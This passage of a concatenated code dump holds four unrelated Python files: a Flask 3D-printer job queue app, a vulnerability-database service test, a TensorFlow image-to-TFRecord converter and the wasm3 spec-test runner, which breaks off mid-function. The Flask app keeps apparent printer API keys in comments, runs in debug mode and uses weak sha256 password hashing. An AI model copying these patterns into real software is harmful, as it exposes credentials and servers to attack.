app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# Initialise bootstrap and DB
Bootstrap(app)
db = SQLAlchemy(app)
# Config login manager
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
printers = [
# Printer('Ultimaker 2+ (1)', '192.168.0.201', 'B5A36115A3DC49148EFC52012E7EBCD9',
# 'Hackspace', 'duplicator', 'PLA', 'red'),
# Printer('Ultimaker 2+ (2)', '192.168.0.202', 'ED7F718BBE11456BA3619A04C66EF74A',
# 'Hackspace', 'Ultimaker 2+', 'PLA', 'red')
]
orchestrator = Orchestrator(printers)
# Printer('Ultimaker 2+ (1)', '192.168.0.201', 'B5A36115A3DC49148EFC52012E7EBCD9',
# 'Hackspace', 'duplicator', 'PLA', 'red'),
# Printer('Ultimaker 2+ (2)', '192.168.0.202', 'ED7F718BBE11456BA3619A04C66EF74A',
# 'Hackspace', 'Ultimaker 2+', 'PLA', 'red')
worker_thread = threading.Thread(target=orchestrator.run, args=(waiting_q, printing_q, ))
worker_thread.start()
# ADMIN
admin = Admin(app)
# DB ENTRIES
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
faculty = db.Column(db.String(80))
password = db.Column(db.String(80))
class Printers(BaseView):
@expose('/')
def printers(self):
return self.render('/admin/printers.html', printer_list=make_printer_advanced_info())
class jobQueue(BaseView):
@expose('/')
def jobqueue(self):
return self.render('/admin/jobQueue.html', job_list=make_jobs_list())
# class IFrame(BaseView):
# @expose('/iframe/')
# def index(self):
# return self.render('admin/iframe.html', printers)
admin.add_view(ModelView(User, db.session))
admin.add_view(Printers(name='Printers', endpoint='printers'))
admin.add_view(jobQueue(name='Job Queue', endpoint='jobQueue'))
# FORM ENTRIES
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class loginForm(FlaskForm):
username = StringField('username', validators=[InputRequired(), Length(min=4, max=15)])
password = PasswordField('password', validators=[InputRequired(), Length(min=8, max=80)])
remember = BooleanField('remember me')
valid_emails = ["my.bristol.ac.uk", "bristol.ac.uk"]
class registerForm(FlaskForm):
username = StringField('username', validators=[InputRequired(), Length(min=4, max=15)])
email = StringField('email', validators=[InputRequired(), Email(
message='Invalid email'), Length(max=50), checkUobEmail()])
faculty = StringField('faculty', validators=[InputRequired(), Length(max=80)])
password = PasswordField('password', validators=[InputRequired(), Length(min=8, max=80)])
class uploadForm(FlaskForm):
colour = SelectField('Filament colour', choices=[('r', 'Red'), ('b', 'Black'), ('g', 'Grey')])
material = SelectField('Filament material', choices=[(
'pla', 'PLA'), ('abs', 'ABS'), ('ninja', 'NinjaFlex')])
gcode = FileField('gcode file', validators=[
FileRequired()])
def make_printer_info():
printer_info = []
for printer in printers:
printer_info.append([printer.name, printer.location, printer.simple_status()])
return printer_info
def make_printer_advanced_info():
global printers
printer_info = []
for printer in printers:
printer_info.append([printer.name, printer.location, printer.simple_status(), printer.url])
return printer_info
# APP ROUTES
@app.route('/')
def index():
return render_template('index.html', printer_list=make_printer_info())
@app.route('/testupload', methods=['GET', 'POST'])
def testUpload():
form = uploadForm()
if form.validate_on_submit():
colour = form.colour.data
material = form.material.data
gcode = form.gcode.data
filename = secure_filename(gcode.filename)
gcode.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return "working"
return render_template('testUpload.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
form = loginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
return redirect(url_for('dashboard'))
flash('Invalid username or password')
return render_template('login.html', form=form)
return render_template('login.html', form=form)
@app.route('/signup', methods=['GET', 'POST'])
def signup():
form = registerForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method='sha256')
new_user = User(username=form.username.data,
email=form.email.data, faculty=form.faculty.data, password=hashed_password)
db.session.add(new_user)
db.session.commit()
flash('New user created')
return render_template('signup.html', form=form)
return render_template('signup.html', form=form)
def make_jobs_list():
unformatted_jobs = list(printing_q.queue) + list(waiting_q.queue) # TODO: Is this right?
job_list = []
for job in unformatted_jobs:
if job.time_remaining != 'Pending':
new_time = str(int(job.time_remaining.split(' ')[0]) - 1) + " mins"
job.time_remaining = new_time
printer = job.printing_on
if printer is None:
stream_url = '#'
else:
stream_url = printer.url + '/webcam/?action=stream'
job_list.append([job.filename.split('/')[-1], job.user.username,
job.location, job.time_remaining, stream_url])
return job_list
@app.route('/dashboard')
@login_required
def dashboard():
return render_template('dashboard/dashboard.html', name=current_user.username, job_list=make_jobs_list())
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['GET', 'POST'])
@login_required
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash("No file part")
return render_template('dashboard/upload.html')
user_file = request.files['file']
# if user does not select file, browser also
# submits an empty part without a filename
if user_file.filename == '':
flash("No file extension")
return render_template('dashboard/upload.html')
if not allowed_file(user_file.filename):
flash("Invalid file extension")
return render_template('dashboard/upload.html')
if user_file and allowed_file(user_file.filename):
filename = secure_filename(user_file.filename)
path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
user_file.save(path)
new_job = Job(path, 'black', 'PLA', current_user)
waiting_q.put(new_job)
flash("File uploaded succesfully")
return render_template('dashboard/upload.html')
return render_template('dashboard/upload.html')
@app.route('/history')
@login_required
def history():
return render_template('dashboard/history.html', name=current_user.username)
@app.route('/profile')
@login_required
def profile():
return render_template('dashboard/profile.html', name=current_user.username, email=current_user.email, faculty=current_user.faculty)
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
app.run(debug=True)
|
test_database_service.py
|
from __future__ import absolute_import
from unittest import TestCase
from database.memory_db import MemoryDB
from database.database_service import database_service
from database.database_service import DBClient
from service.server import config
import time, ast, os, json, requests
from multiprocessing import Process
class TestDBComponents(TestCase):
@classmethod
def setUpClass(self):
self.process = Process(target=database_service)
self.process.start()
time.sleep(2)
self.client = DBClient(config["database"])
self.DB = MemoryDB()
@classmethod
def tearDownClass(self):
os.system("kill " + str(self.process.pid))
time.sleep(2)
# Basically all tests are checking if making a query through the component DBPrivileges
# gives the same result as querying the database directly
def test_privileges_none(self):
a = self.DB.get_privileges('libguestfs', '1.21.24')
b = self.client.db_request("/privileges", 'libguestfs', '1.21.24')
self.assertEqual(a, b)
def test_privileges_all(self):
a = self.DB.get_privileges('windows_2000', '*')
b = self.client.db_request("/privileges", 'windows_2000', '*')
self.assertEqual(a, b)
# Basically all tests are checking if making a query through the component DBQuery
# gives the same result as querying the database directly
def test_query_simple(self):
a = self.DB.query('libguestfs', '1.21.24')
b = self.client.db_request("/vulnerability", 'libguestfs', '1.21.24')
self.assertEqual(a, b)
def test_query_2002(self):
for version in ['1.0', '1.1', '2.1.5', '2.2.4']:
a = self.DB.query('freebsd', version)
b = self.client.db_request("/vulnerability", 'freebsd', version)
self.assertEqual(a, b)
def test_query_2007(self):
for version in ['3.0', '4.0']:
a = self.DB.query('metaframe', version)
b = self.client.db_request("/vulnerability", 'metaframe', version)
self.assertEqual(a, b)
|
build_image_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to its line number, starting from 1 (index 0 is reserved for the background class).
tf.app.flags.DEFINE_string('labels_file', 'labels_file.txt', 'Labels file')
FLAGS = tf.app.flags.FLAGS
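# Example invocation (illustrative paths only), matching the flags defined above:
#   python build_image_data.py \
#     --train_directory=/path/to/train --validation_directory=/path/to/validation \
#     --output_directory=/path/to/output --labels_file=labels_file.txt \
#     --train_shards=2 --validation_shards=2 --num_threads=2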
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = b'RGB'
channels = 3
image_format = b'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(text.encode()),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename).encode()),
'image/encoded': _bytes_feature(image_buffer)}))
return example
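# A minimal parsing sketch (not part of the original pipeline; the function name is
# illustrative) showing how a consumer could decode one serialized Example produced by
# _convert_to_example() above, using the TF1-style parsing ops.
def _parse_example_sketch(serialized_example):
  """Decode one serialized Example back into an image tensor and its label."""
  features = tf.parse_single_example(
      serialized_example,
      features={
          'image/encoded': tf.FixedLenFeature([], tf.string),
          'image/class/label': tf.FixedLenFeature([], tf.int64),
          'image/class/text': tf.FixedLenFeature([], tf.string, default_value=''),
      })
  # The encoded bytes are the JPEG written by _convert_to_example().
  image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
  return image, features['image/class/label']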
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg, feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg, feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'rb').read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames, texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 1 corresponding to the
label contained in the first line (index 0 is left as the background class).
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
print(jpeg_file_path)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(unique_labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory, FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
run-spec-test.py
|
#!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-spec-test.py
# ./run-spec-test.py ./core/i32.json
# ./run-spec-test.py ./core/float_exprs.json --line 2070
# ./run-spec-test.py ./proposals/tail-call/*.json
# ./run-spec-test.py --exec "../build-custom/wasm3 --repl"
#
# Running WASI version with different engines:
# cp ../build-wasi/wasm3.wasm ./
# ./run-spec-test.py --exec "../build/wasm3 wasm3.wasm --repl"
# ./run-spec-test.py --exec "wasmtime --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. --backend=llvm wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer-js run wasm3.wasm --dir=. -- --repl"
# ./run-spec-test.py --exec "wasirun wasm3.wasm --repl"
# ./run-spec-test.py --exec "wavm run --mount-root ./ wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "iwasm --dir=. wasm3.wasm --repl"
#
# TODO
# - Get more tests from: https://github.com/microsoft/ChakraCore/tree/master/test/WasmSpec
# - Fix "Empty Stack" check
# - Check Canonical NaN and Arithmetic NaN separately
# - Fix imports.wast
import argparse
import os, sys, glob, time
import subprocess
import json
import re
import struct
import math
import pathlib
scriptDir = os.path.dirname(os.path.abspath(sys.argv[0]))
sys.path.append(os.path.join(scriptDir, '..', 'extra'))
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3 --repl")
parser.add_argument("--timeout", type=int, default=30)
parser.add_argument("--line", metavar="<source line>", type=int)
parser.add_argument("--all", action="store_true")
parser.add_argument("--show-logs", action="store_true")
parser.add_argument("--format", choices=["raw", "hex", "fp"], default="fp")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-s", "--silent", action="store_true")
parser.add_argument("file", nargs='*')
args = parser.parse_args()
if args.line:
args.show_logs = True
#
# Utilities
#
log = open("spec-test.log","w+")
log.write("======================\n")
def warning(msg):
log.write("Warning: " + msg + "\n")
log.flush()
if args.verbose:
print(f"{ansi.WARNING}Warning:{ansi.ENDC} {msg}")
def fatal(msg):
log.write("Fatal: " + msg + "\n")
log.flush()
print(f"{ansi.FAIL}Fatal:{ansi.ENDC} {msg}")
sys.exit(1)
def binaryToFloat(num, t):
if t == "f32":
return struct.unpack('!f', struct.pack('!L', int(num)))[0]
elif t == "f64":
return struct.unpack('!d', struct.pack('!Q', int(num)))[0]
else:
fatal(f"Unknown type '{t}'")
def escape_str(s):
if s == "":
return r'\x00'
if all((ord(c) < 128 and c.isprintable() and not c in " \n\r\t\\") for c in s):
return s
return '\\x' + '\\x'.join('{0:02x}'.format(x) for x in s.encode('utf-8'))
#
# Value format options
#
def formatValueRaw(num, t):
return str(num)
def formatValueHex(num, t):
if t == "f32" or t == "i32":
return "{0:#0{1}x}".format(int(num), 8+2)
elif t == "f64" or t == "i64":
return "{0:#0{1}x}".format(int(num), 16+2)
else:
return str(num)
def formatValueFloat(num, t):
if t == "f32":
s = 6
elif t == "f64":
s = 10
else:
return str(num)
result = "{0:.{1}f}".format(binaryToFloat(num, t), s).rstrip('0')
if result.endswith('.'): result = result + '0'
if len(result) > s*2:
result = "{0:.{1}e}".format(binaryToFloat(num, t), s)
return result
formaters = {
'raw': formatValueRaw,
'hex': formatValueHex,
'fp': formatValueFloat,
}
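# Worked example (illustrative, not part of the test flow): the spec encodes an f32 1.0
# as the integer bit pattern 1065353216 (0x3f800000), so:
#   formatValueHex(1065353216, "f32")   -> "0x3f800000"
#   formatValueFloat(1065353216, "f32") -> "1.0"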
formatValue = formaters[args.format]
if args.format == "fp":
print("When using fp display format, values are compared loosely (some tests may produce false positives)")
#
# Spec tests preparation
#
if not (os.path.isdir("./core") and os.path.isdir("./proposals")):
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
officialSpec = "https://github.com/wasm3/wasm-core-testsuite/archive/v1.1.zip"
print(f"Downloading {officialSpec}")
resp = urlopen(officialSpec)
with ZipFile(BytesIO(resp.read())) as zipFile:
for zipInfo in zipFile.infolist():
if re.match(r".*-.*/.*/.*(\.wasm|\.json)", zipInfo.filename):
parts = pathlib.Path(zipInfo.filename).parts
newpath = str(pathlib.Path(*parts[1:-1]))
newfn = str(pathlib.Path(*parts[-1:]))
ensure_path(newpath)
newpath = newpath + "/" + newfn
zipInfo.filename = newpath
zipFile.extract(zipInfo)
#
# Wasm3 REPL
#
from subprocess import Popen, STDOUT, PIPE
from threading import Thread
from queue import Queue, Empty
import shlex
class Wasm3():
def __init__(self, exe):
self.exe = exe
self.p = None
self.loaded = None
self.timeout = args.timeout
self.autorestart = True
self.run()
def run(self):
if self.p:
self.terminate()
cmd = shlex.split(self.exe)
#print(f"wasm3: Starting {' '.join(cmd)}")
self.q = Queue()
self.p = Popen(cmd, bufsize=0, stdin=PIPE, stdout=PIPE, stderr=STDOUT)
def _read_output(out, queue):
for data in iter(lambda: out.read(1024), b''):
queue.put(data)
queue.put(None)
self.t = Thread(target=_read_output, args=(self.p.stdout, self.q))
self.t.daemon = True
self.t.start()
try:
self._read_until("wasm3> ")
except Exception as e:
print(f"wasm3: Could not start: {e}")
def restart(self):
print(f"wasm3: Restarting")
for i in range(10):
try:
self.run()
try:
if self.loaded:
self.load(self.loaded)
except Exception as e:
pass
break
except Exception as e:
print(f"wasm3: {e} => retry")
time.sleep(0.1)
def init(self):
return self._run_cmd(f":init\n")
def version(self):
return self._run_cmd(f":version\n")
def load(self, fn):
# WAVM mounts root, so it expects an absolute path
if "wavm run" in self.exe:
fn = "/" + fn
self.loaded = None
res = self._run_cmd(f":load {fn}\n")
self.loaded = fn
return res
def invoke(self, cmd):
return self._run_cmd(" ".join(map(str, cmd)) + "\n")
def _run_cmd(self, cmd):
if self.autorestart and not self._is_running():
self.restart()
self._flush_input()
#print(f"wasm3: {cmd.strip()}")
self._write(cmd)
return self._read_until("wasm3> ")
def _read_until(self, token):
buff = ""
tout = time.time() + self.timeout
error = None
while time.time() < tout:
try:
data = self.q.get(timeout=0.1)
if data is None:
error = "Crashed"
break
buff = buff + data.decode("utf-8")
idx = buff.rfind(token)
if idx >= 0:
return buff[0:idx].strip()
except Empty:
pass
else:
error = "Timeout"
self.terminate()
raise Exception(error)
def _write(self, data):
self.p.stdin.write(data.encode("utf-8"))
self.p.stdin.flush()
def _is_running(self):
return self.p and (self.p.poll() is None)
def _flush_input(self):
while not self.q.empty():
self.q.get()
def terminate(self):
self.p.stdin.close()
self.p.terminate()
self.p.wait(timeout=1.0)
self.p = None
#
# Actual test
#
wasm3 = Wasm3(args.exec)
wasm3_ver = wasm3.version()
print(wasm3_ver)
blacklist = Blacklist([
"float_exprs.wast:* f32.nonarithmetic_nan_bitpattern*",
"imports.wast:*",
"names.wast:* *.wasm \\x00*", # names that start with '\0'
])
if wasm3_ver in Blacklist(["* MSVC *, x86)", "* Clang * for Windows, x86)"]):
warning("Win32 x86 has i64->f32 conversion precision issues, skipping some tests")
# See: https://docs.microsoft.com/en-us/cpp/c-runtime-library/floating-point-support
blacklist.add([
"conversions.wast:* f32.convert_i64_u(9007199791611905)",
"conversions.wast:* f32.convert_i64_u(9223371761976868863)",
"conversions.wast:* f32.convert_i64_u(9223372586610589697)",
])
elif wasm3_ver in Blacklist(["* GCC *, mips*"]):
warning("MIPS has NaN representation issues, skipping some tests")
blacklist.add([
"float_exprs.wast:* *_nan_bitpattern(*",
"float_exprs.wast:* *no_fold_*",
])
elif wasm3_ver in Blacklist(["* GCC *, sparc*"]):
warning("SPARC has NaN representation issues, skipping some tests")
blacklist.add([
"float_exprs.wast:* *.canonical_nan_bitpattern(0, 0)",
])
stats = dotdict(total_run=0, skipped=0, failed=0, crashed=0, timeout=0, success=0, missing=0)
# Convert some trap names from the original spec
trapmap = {
"unreachable": "unreachable executed"
}
def runInvoke(test):
test.cmd = [test.action.field]
displayArgs = []
for arg in test.action.args:
test.cmd.append(arg['value'])
displayArgs.append(formatValue(arg['value'], arg['type']))
test_id = f"{test.source} {test.wasm} {test.cmd[0]}({', '.join(test.cmd[1:])})"
if test_id in blacklist and not args.all:
warning(f"Skipped {test_id} (blacklisted)")
stats.skipped += 1
return
if args.verbose:
print(f"Running {test_id}")
stats.total_run += 1
output = ""
actual = None
actual_val = None
force_fail = False
try:
output = wasm3.invoke(test.cmd)
except Exception as e:
actual = f"<{e}>"
force_fail = True
# Parse the actual output
if not actual:
result = re.findall(r'Result: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "result " + result[-1]
actual_val = result[0]
if not actual:
result = re.findall(r'Error: \[trap\] (.*?) \(', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "trap " + result[-1]
if not actual:
result = re.findall(r'Error: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "error " + result[-1]
if not actual:
actual = "<No Result>"
force_fail = True
if actual == "error no operation ()":
actual = "<Not Implemented>"
stats.missing += 1
force_fail = True
elif actual == "<Crashed>":
stats.crashed += 1
force_fail = True
elif actual == "<Timeout>":
stats.timeout += 1
force_fail = True
# Prepare the expected result
expect = None
if "expected" in test:
if len(test.expected) == 0:
expect = "result <Empty Stack>"
elif len(test.expected) == 1:
t = test.expected[0]['type']
value = str(test.expected[0]['value'])
expect = "result " + value
if actual_val is not None:
if (t == "f32" or t == "f64") and (value == "nan:canonical" or value == "nan:arithmetic"):
val = binaryToFloat(actual_val, t)
#warning(f"{actual_val} => {val}")
if math.isnan(val):
actual = "nan:any"
expect = "nan:any"
else:
expect = "result " + formatValue(value, t)
actual = "result " + formatValue(actual_val, t)
else:
warning(f"Test {test.source} specifies multiple results")
expect = "result <Multiple>"
elif "expected_trap" in test:
if test.expected_trap in trapmap:
test.expected_trap = trapmap[test.expected_trap]
expect = "trap " + str(test.expected_trap)
elif "expected_anything" in test:
expect = "<Anything>"
else:
expect = "<Unknown>"
def showTestResult():
print(" ----------------------")
print(f"Test: {ansi.HEADER}{test_id}{ansi.ENDC}")
print(f"Args: {', '.join(displayArgs)}")
print(f"Expected: {ansi.OKGREEN}{expect}{ansi.ENDC}")
print(f"Actual: {ansi.WARNING}{actual}{ansi.ENDC}")
if args.show_logs and len(output):
print(f"Log:")
print(output)
log.write(f"{test.source}\t|\t{test.wasm} {test.action.field}({', '.join(displayArgs)})\t=>\t\t")
